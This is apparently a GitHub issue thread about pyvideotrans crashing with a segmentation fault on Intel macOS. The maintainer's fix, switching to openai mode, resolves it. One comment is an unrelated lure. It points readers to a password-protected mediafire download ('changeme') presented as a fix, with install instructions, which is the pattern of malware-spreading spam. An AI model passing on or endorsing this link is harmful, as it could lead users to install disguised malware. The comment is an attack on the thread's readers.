### ISSUE TITLE
Intel平台macos运行视频转字幕功能VAD完成后会自动退出

### ISSUE THREAD

**Issue by nonetail22** [jianchang512/pyvideotrans#522]
**出错信息**
VAD完成后，报错
DEBUG:faster_whisper:Processing segment at 00:00.000
zsh: segmentation fault  python sp.py
sp.py直接退出了

**复现步骤**
1. 视频转字幕
2. faster模式
3. tiny.en

**操作系统**
 - macOS 13.6.8
 - intel 处理器

**软件左上角版本号数字**
2.37

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jianchang512** [comment]
选择 openai 模式试试   openai模型在此下载
https://github.com/jianchang512/stt/releases/tag/0.0

**Comment by nonetail22** [comment]
> 选择 openai 模式试试 openai模型在此下载 https://github.com/jianchang512/stt/releases/tag/0.0

好使，解决了
